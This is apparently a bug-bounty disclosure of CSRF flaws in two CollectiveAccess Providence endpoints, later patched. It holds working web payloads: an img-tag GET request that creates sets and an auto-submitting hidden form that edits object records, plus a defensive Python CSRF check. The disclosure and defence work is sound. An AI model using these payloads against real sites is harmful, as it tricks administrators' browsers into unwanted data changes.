Cross-Site Request Forgery (CSRF) in collectiveaccess/providence

Valid

Reported on

Oct 11th 2021


Description

More AJAX endpoints vulnerable to CSRF.

1: GET http://10.0.2.15/providence/index.php/find/BrowseObjects/createSetFromResult

2: POST http://10.0.2.15/providence/index.php/find/SearchObjects/saveResultsEditorData

Proof of Concept

1: http://10.0.2.15/providence/index.php/find/BrowseObjects/createSetFromResult?set_name=new&mode=from_results&item_ids=

<img src="http://10.0.2.15/providence/index.php/find/BrowseObjects/createSetFromResult?set_name=new&mode=from_results&item_ids=">

2: http://10.0.2.15/providence/index.php/find/SearchObjects/saveResultsEditorData

<html>
  <body>
        <form action="http://10.0.2.15/providence/index.php/find/SearchObjects/saveResultsEditorData" method="POST">
        <input type="hidden" name="_formName" value="caEditableResultsComplexDataForm" />
        <input type="hidden" name="form_timestamp" value="2633930542" />
        <input type="hidden" name="id" value="1" />
        <input type="hidden" name="row" value="0" />
        <input type="hidden" name="col" value="0" /> 
        <input type="hidden" name="idno_accession_number" value="edited!" />
        <input type="hidden" name="bundle" value="ca_objects%2Cidno" />
        </form>
        <script>
        document.forms[0].submit();
        </script>
  </body>
</html>

Impact

This vulnerability is capable of tricking admins into editing object data and creating objects.
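As an added defender-side illustration (not Providence's own code and not the fix referenced in this report), the Python below shows the three checks that stop both proofs of concept: refusing state changes over GET (the img-tag case), rejecting a cross-site Origin/Referer, and requiring a per-session, per-form token that an attacker's page cannot read. SITE_ORIGIN, the `csrf_token` field name, the Request class and the attacker.example host are assumptions, and the two request objects are constructed to mirror the report's PoCs.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

SITE_ORIGIN = "http://10.0.2.15"  # assumption: origin taken from the report's URLs

@dataclass
class Request:  # minimal stand-in for a framework request object
    method: str
    path: str
    headers: dict
    form: dict = field(default_factory=dict)

def issue_csrf_token(session: dict, form_name: str) -> str:
    """Token for one form: HMAC of the form name under a per-session secret."""
    secret = session.setdefault("csrf_secret", secrets.token_hex(32))
    return hmac.new(secret.encode(), form_name.encode(), hashlib.sha256).hexdigest()

def csrf_guard(req: Request, session: dict) -> tuple[bool, str]:
    """Return (allowed, reason) for a state-changing request."""
    # 1. Writes must not be reachable via GET; an <img src=...> alone triggers them.
    if req.method != "POST":
        return False, "state change requested via GET"
    # 2. Browsers add Origin (or at least Referer) to cross-site form posts;
    #    anything missing or foreign is rejected.
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if source is None:
        return False, "no Origin/Referer header"
    p = urlparse(source)
    if f"{p.scheme}://{p.netloc}" != SITE_ORIGIN:
        return False, f"cross-site source: {source}"
    # 3. The form must carry a token bound to this session and to this form name.
    form_name = req.form.get("_formName", "")
    token = req.form.get("csrf_token", "")
    if "csrf_secret" not in session or not form_name:
        return False, "no session token to compare against"
    expected = issue_csrf_token(session, form_name)
    if not hmac.compare_digest(token.encode(), expected.encode()):
        return False, "missing or invalid csrf_token"
    return True, "ok"

# Constructed requests mirroring the report's two proofs of concept.
POC_IMG_GET = Request("GET", "/providence/index.php/find/BrowseObjects/createSetFromResult",
                      {"Referer": "http://attacker.example/page.html"})
POC_FORM_POST = Request("POST", "/providence/index.php/find/SearchObjects/saveResultsEditorData",
                        {"Origin": "http://attacker.example"},
                        {"_formName": "caEditableResultsComplexDataForm", "id": "1",
                         "idno_accession_number": "edited!"})
```

A token minted for one form name does not validate for another, so a leaked token for a harmless form cannot be replayed against the results editor.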

We have contacted a member of the collectiveaccess/providence team and are waiting to hear back 2 months ago
CollectiveAccess validated this vulnerability a month ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
CollectiveAccess (Maintainer), a month ago:

Thanks for finding this one. It's patched.

CollectiveAccess confirmed that a fix has been merged on 815d5d a month ago
CollectiveAccess has been awarded the fix bounty